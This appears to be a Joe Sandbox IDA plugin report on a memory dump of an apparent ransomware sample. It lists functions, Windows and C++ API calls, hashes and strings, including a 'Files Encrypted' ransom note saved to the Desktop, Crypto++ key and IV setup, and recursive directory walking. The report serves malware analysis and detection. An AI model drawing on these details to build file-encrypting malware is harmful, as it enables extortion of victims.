Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$?setstate@?$basic_ios@Bios_base@std@@D@std@@@std@@U?$char_traits@_dupenv_sfreememset
String ID: </p></body></html>$<html><body><h1>Files Encrypted</h1><p>Your files have been encrypted.</p>$<p>Unique id: $USERPROFILE$\Desktop\README.html
API String ID: 1662671771-2662666688
Opcode ID: 00b49e682827ec137516dc6d34efd380ba56445dddda408d624b84794de18919
Instruction ID: 5f9f370f0b8cdd56bdb75d68d1c1cc1c77b9336a9b6b86f404a0ca18ce31e416
Opcode Fuzzy Hash: 00b49e682827ec137516dc6d34efd380ba56445dddda408d624b84794de18919
Instruction Fuzzy Hash: 40718372A28B8696EB10DF25D5403A96361FB857D4F405236EABD83AE9EF3CE145C700

Function 00007FF6F18CD958 Relevance: 19.7, APIs: 13, Instructions: 154COMMON

Download Yara Rule

APIs

__std_fs_open_handle.LIBCPMT ref: 00007FF6F18CD998

Part of subcall function 00007FF6F18CD900: CreateFileW.KERNEL32 ref: 00007FF6F18CD933
Part of subcall function 00007FF6F18CD900: GetLastError.KERNEL32 ref: 00007FF6F18CD942

SetFileInformationByHandle.KERNEL32 ref: 00007FF6F18CD9C2
__std_fs_open_handle.LIBCPMT ref: 00007FF6F18CD9FA
CloseHandle.KERNEL32 ref: 00007FF6F18CDA14
GetLastError.KERNEL32 ref: 00007FF6F18CDA48
GetFileInformationByHandleEx.KERNEL32 ref: 00007FF6F18CDA94
GetLastError.KERNEL32 ref: 00007FF6F18CDAA2
CloseHandle.KERNEL32 ref: 00007FF6F18CDAB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18CDAC6
SetFileInformationByHandle.KERNEL32 ref: 00007FF6F18CDAE6
SetFileInformationByHandle.KERNEL32 ref: 00007FF6F18CDB1A
GetLastError.KERNEL32 ref: 00007FF6F18CDB3C
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18CDB6F

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: Handle$File$ErrorInformationLast$Close__std_fs_open_handleabort$Create
String ID:
API String ID: 503677281-0
Opcode ID: 740b96d01adb45c042b5fa50dd2d587a1558b15336f0030c52e18ff8ab161487
Instruction ID: 2e0e9178064479e6a9e46452f1e99398d3f22f0113b2ead7fd9f91bc287a73e2
Opcode Fuzzy Hash: 740b96d01adb45c042b5fa50dd2d587a1558b15336f0030c52e18ff8ab161487
Instruction Fuzzy Hash: B3518022F2864289F724AB759A446BD3BA1AF457E4F040335CD3FD7AD9EF28E4458780

Function 00007FF6F18B4B30 Relevance: 18.2, APIs: 5, Strings: 7, Instructions: 245COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B4C96
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B4CDD
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B4D24

Part of subcall function 00007FF6F18B3A90: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B3B6A

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B4DB0
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B4E65

Strings

StreamTransformationFilter: ONE_AND_ZEROS_PADDING cannot be used with , xrefs: 00007FF6F18B4C6B
ArraySink: missing OutputBuffer argument, xrefs: 00007FF6F18B4E38
BlockPaddingScheme, xrefs: 00007FF6F18B4B75
StreamTransformationFilter: PKCS_PADDING cannot be used with , xrefs: 00007FF6F18B4CB2
FilterWithBufferedInput, xrefs: 00007FF6F18B4D83
OutputBuffer, xrefs: 00007FF6F18B4DFC
StreamTransformationFilter: W3C_PADDING cannot be used with , xrefs: 00007FF6F18B4CF9

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionThrow$_invalid_parameter_noinfo_noreturn
String ID: ArraySink: missing OutputBuffer argument$BlockPaddingScheme$FilterWithBufferedInput$OutputBuffer$StreamTransformationFilter: ONE_AND_ZEROS_PADDING cannot be used with $StreamTransformationFilter: PKCS_PADDING cannot be used with $StreamTransformationFilter: W3C_PADDING cannot be used with
API String ID: 2822070131-2998954418
Opcode ID: 3d1008968bc2a02b8092f10083acea29f7f9736a9989f6d089f98a278259762e
Instruction ID: 81c3faefe9fcb59b298519ea736e9574d19e5e15c15da6744676fe4f0892e3d3
Opcode Fuzzy Hash: 3d1008968bc2a02b8092f10083acea29f7f9736a9989f6d089f98a278259762e
Instruction Fuzzy Hash: B7918262A28A4692EF20DB25E9913AD7361FB89BC4F445132DA7D837E5EF3CD509C700

Function 00007FF6F18AD4D0 Relevance: 18.2, APIs: 12, Instructions: 194COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18AD56E
?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6F18AD58E
?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18AD59E
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD5E6
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD60E
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD653
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD66E
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD69A
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6F18AD6C6
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6F18AD70C
?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF6F18AD713
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6F18AD720

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?good@ios_base@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
String ID:
API String ID: 3107587312-0
Opcode ID: 42cb97062379d30c0ac274d840254f2e46a49a1e5ee3ef49eac8aa2a1317986d
Instruction ID: 7b7ba6041b5fd5b941ce1d3bd42662cd767a8f3c6d43b3c4239c54bb0c2fe205
Opcode Fuzzy Hash: 42cb97062379d30c0ac274d840254f2e46a49a1e5ee3ef49eac8aa2a1317986d
Instruction Fuzzy Hash: 5A816162A19A9292EB10CB19D6D013C7BA1EF85BD5B158232DA7FC37E0DF39D852C740

Function 00007FF6F18A4E70 Relevance: 18.1, APIs: 12, Instructions: 105COMMON

Download Yara Rule

APIs

_Mtx_lock.MSVCP140 ref: 00007FF6F18A4E8B
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF6F18A4EB3
_Mtx_unlock.MSVCP140 ref: 00007FF6F18A4EC5
_Cnd_broadcast.MSVCP140 ref: 00007FF6F18A4ED2
_Thrd_id.MSVCP140 ref: 00007FF6F18A4EEE
_Thrd_join.MSVCP140 ref: 00007FF6F18A4F0C
_Cnd_destroy_in_situ.MSVCP140 ref: 00007FF6F18A4F30
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF6F18A4FBA
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF6F18A4FC6
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A4FCD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A4FD4
?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140 ref: 00007FF6F18A4FE0

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: Cpp_error@std@@Throw_$Cnd_broadcastCnd_destroy_in_situMtx_lockMtx_unlockThrd_idThrd_join_invalid_parameter_noinfo_noreturnterminate
String ID:
API String ID: 161867533-0
Opcode ID: 25e21b5595269a41144fcc7003ceeecc782cf720a254ea9ac62e042dc33aefc8
Instruction ID: 6435816dd4b93f85caa55ca85bfc93c9e4600d0832b52279d2e12b0f670c07e9
Opcode Fuzzy Hash: 25e21b5595269a41144fcc7003ceeecc782cf720a254ea9ac62e042dc33aefc8
Instruction Fuzzy Hash: 54415D21A28A82A7FB188B64D65436973A5FF50BD5F088536D77D83AD4EF6CE4A4C300

Function 00007FF6F18AA960 Relevance: 16.6, APIs: 11, Instructions: 130COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6F18AA9A1
??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AA9C0
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AA9F2
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAA0D
?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAA37
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAA54
_get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAA7B
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAAC6

Part of subcall function 00007FF6F18AB860: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF6F18AB88D
Part of subcall function 00007FF6F18AB860: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF6F18AB8A7
Part of subcall function 00007FF6F18AB860: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF6F18AB8D9
Part of subcall function 00007FF6F18AB860: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF6F18AB904
Part of subcall function 00007FF6F18AB860: std::_Facet_Register.LIBCPMT ref: 00007FF6F18AB91D
Part of subcall function 00007FF6F18AB860: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF6F18AB93C

?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAADB
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAAF2
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,00000020,?,?,00007FF6F18A6699), ref: 00007FF6F18AAB34

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$Lockit@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@Bid@locale@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
String ID:
API String ID: 3067465659-0
Opcode ID: bf4288761464458186b2dd3bdc82ff1428ff7499f2b4e43a75d4025665c45866
Instruction ID: 53e9f9841eb246f40b814b5b451c84485c0bef2b1bf61d7e96e3b2018aafcaaa
Opcode Fuzzy Hash: bf4288761464458186b2dd3bdc82ff1428ff7499f2b4e43a75d4025665c45866
Instruction Fuzzy Hash: 53518E32619B8286EB00CF65E95026D77A5FB49FC9F144036CAAE83BA4EF3DD015C700

Function 00007FF6F18AC8B0 Relevance: 16.6, APIs: 11, Instructions: 126COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F18A65D5), ref: 00007FF6F18AC8ED
??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6F18AC90C
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6F18AC93E
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6F18AC959
?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF6F18AC983
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6F18AC9A0
_get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6F18AC9C7
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF6F18ACA12

Part of subcall function 00007FF6F18AB860: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF6F18AB88D
Part of subcall function 00007FF6F18AB860: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF6F18AB8A7
Part of subcall function 00007FF6F18AB860: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF6F18AB8D9
Part of subcall function 00007FF6F18AB860: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF6F18AB904
Part of subcall function 00007FF6F18AB860: std::_Facet_Register.LIBCPMT ref: 00007FF6F18AB91D
Part of subcall function 00007FF6F18AB860: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF6F18AB93C

?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18ACA27
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6F18ACA3E
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6F18ACA80

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$Lockit@std@@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@Bid@locale@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
String ID:
API String ID: 3731820665-0
Opcode ID: 45afe836d1484c473fe8c5a9915a5dd6fff57a64e50d00aa7835bc0a3bd05c78
Instruction ID: d0c2c2351e4e6c1e64abcd2975dac7d70438a74d52a3d159e78f845756f4f99e
Opcode Fuzzy Hash: 45afe836d1484c473fe8c5a9915a5dd6fff57a64e50d00aa7835bc0a3bd05c78
Instruction Fuzzy Hash: 59514C32619F8686EB00CF65E95026977A5FB49FC8F144035DAAD83BA8EF3DD055C740

Function 00007FF6F18A6DE0 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 370COMMON

Download Yara Rule

APIs

__std_fs_code_page.MSVCPRT ref: 00007FF6F18A6E3C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A6EC6
memchr.VCRUNTIME140 ref: 00007FF6F18A7077
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A70FA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A7234

Strings

directory_entry::status, xrefs: 00007FF6F18A735C
recursive_directory_iterator::operator++, xrefs: 00007FF6F18A736B
recursive_directory_iterator::recursive_directory_iterator, xrefs: 00007FF6F18A734B

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_pagememchr
String ID: directory_entry::status$recursive_directory_iterator::operator++$recursive_directory_iterator::recursive_directory_iterator
API String ID: 670800737-262937757
Opcode ID: a63f7b8405fab6a2a466d2b78ec6e475940b6f016301158a6dfb83a781f14d4c
Instruction ID: b9496b016f4749d52b545582c6999d18f261d521bad4ea2644c61b8c0c919278
Opcode Fuzzy Hash: a63f7b8405fab6a2a466d2b78ec6e475940b6f016301158a6dfb83a781f14d4c
Instruction Fuzzy Hash: DBF18172A18B8592DB209F25E5403AD6361FB98BE4F544232DABD837D9EF3DE481C740

Function 00007FF6F18B7500 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6F18B752C
memmove.VCRUNTIME140 ref: 00007FF6F18B75D5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B7720

Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE182
Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE190

Part of subcall function 00007FF6F18AE090: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AE1C9
Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE1D3
Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE1E1
Part of subcall function 00007FF6F18AE090: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18AE216

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B775F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B779E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B77ED
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B783C

Strings

operation failed with error , xrefs: 00007FF6F18B75CB, 00007FF6F18B75ED
OS_Rng: , xrefs: 00007FF6F18B7581

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove$Concurrency::cancel_current_taskErrorLast
String ID: operation failed with error $OS_Rng:
API String ID: 393972192-700108173
Opcode ID: 380476296cd9530c4db8c5b9a6a709d5356c7774a83f0d9dcd4de62e77856582
Instruction ID: 96ed2ba47e2a8f1a1a199816c4ca30e5e7cc835d8a71208fd80a6f194d0a9e48
Opcode Fuzzy Hash: 380476296cd9530c4db8c5b9a6a709d5356c7774a83f0d9dcd4de62e77856582
Instruction Fuzzy Hash: F8A17062F24B8685FB00DB64D6403AC2362AB457E8F505236DA7D56BE9EF3CE185C344

Function 00007FF6F18B8699 Relevance: 15.2, APIs: 4, Strings: 6, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F18B7CA0: memmove.VCRUNTIME140 ref: 00007FF6F18B7DAF

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B86CF
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B8711

Part of subcall function 00007FF6F18B9980: memmove.VCRUNTIME140 ref: 00007FF6F18B9B4B
Part of subcall function 00007FF6F18B9980: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B9BC9

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B87B6

Part of subcall function 00007FF6F18B9980: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18B9BDE

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B8866

Strings

: header length of , xrefs: 00007FF6F18B8754
setting key and IV, xrefs: 00007FF6F18B86A8
exceeds the maximum of , xrefs: 00007FF6F18B8778, 00007FF6F18B8829
: additional authenticated data (AAD) cannot be input after data to be encrypted or decrypted, xrefs: 00007FF6F18B86E4
TruncatedFinal, xrefs: 00007FF6F18B86AF
: footer length of , xrefs: 00007FF6F18B8805

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
